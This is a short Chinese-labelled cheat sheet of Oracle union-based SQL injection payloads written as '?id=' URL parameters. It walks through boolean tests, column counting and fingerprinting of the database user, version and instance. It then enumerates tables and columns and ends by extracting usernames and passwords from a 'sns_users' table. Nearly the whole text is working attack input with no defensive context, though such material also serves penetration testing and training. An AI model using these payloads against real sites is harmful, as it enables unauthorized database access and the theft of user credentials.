SYS_CONTEXT()
dual表
V_$INSTANCE系统视图
sys.v_$version系统视图
user_tables系统视图
user_tab_columns系统视图
?id=1 and 1=1 --页面返回正常 ?id=1 and 1=2 --页面返回失败
?id=1 order by 2 --页面返回正常 ?id=1 order by 3 --页面返回失败
?id=1 and 1=2 union select null,null from dual ?id=1 and 1=2 union select 'null',null from dual ?id=1 and 1=2 union select null,'null' from dual
?id=1 and 1=2 union select null,(select sys_context('userenv','current_user') from dual) from dual
?id=1 and 1=2 union select null,(select banner from sys.v_$version where rownum=1) from dual
?id=1 and 1=2 union select null,(select instance_name from sys.V_$INSTANCE) from dual
?id=1 and 1=2 union select null,(select to_char(count(table_name),'999') from user_tables) from dual
?id=1 and 1=2 union select null,(select table_name from user_tables where rownum=1 and table_name like '%user%') from dual
?id=1 and 1=2 union select null,(select to_char(count(column_name),'99') from user_tab_columns where table_name='sns_users') from dual
?id=1 and 1=2 union select null,(select column_name from user_tab_columns where table_name='sns_users' and rownum=1) from dual
?id=1 and 1=2 union select null,(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name not in ('USER_NAME')) from dual
?id=1 and 1=2 union select null,to_char((select count(USER_NAME) from "sns_users"),'9') from dual
?id=1 and 1=2 union select USER_NAME,USER_PWD from "sns_users" where rownum=1
?id=1 and 1=2 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME not in ('zhong')
?id=1 and 1=2 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME not in ('zhong','hu')